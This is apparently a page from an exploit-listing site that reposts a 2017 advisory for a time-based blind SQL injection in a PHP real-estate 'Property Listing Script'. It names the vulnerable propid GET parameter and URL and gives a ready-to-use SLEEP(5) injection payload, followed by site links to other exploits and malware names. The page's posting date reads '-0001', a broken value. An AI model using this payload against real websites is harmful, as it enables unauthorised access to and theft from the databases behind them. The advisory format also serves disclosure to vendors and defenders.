Property Listing Script Time-Based Blind Injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>Property Listing Script – Time-Based Blind Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Exploit Title: Property Listing Script – Time-Based Blind Injection
Date: 02.02.2017
Vendor Homepage: http://phprealestatescript.org/
Software Link: http://phprealestatescript.org/property-listing-script.html
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
 
Overview
 
Advanced PHP Real-Estate Script, we have almost covered the Main features required for a Property Buy and Sell Listing Script.
 
Vulnerable Url: http://locahost/property-list/property_view.php?propid=443[payload]
Parameter: propid (GET)
Type: AND/OR time-based blind
 
Simple Payload:
Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop
</BODY></HTML>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

pgAdmin 8.3 Remote Code Execution
Palo Alto OS Command Injection
Backdoor.Win32.Dumador.c MVID-2024-0679 Buffer Overflow
Centreon 23.10-1.el8 SQL Injection
Stock Management System 1.0 SQL Injection

Last 20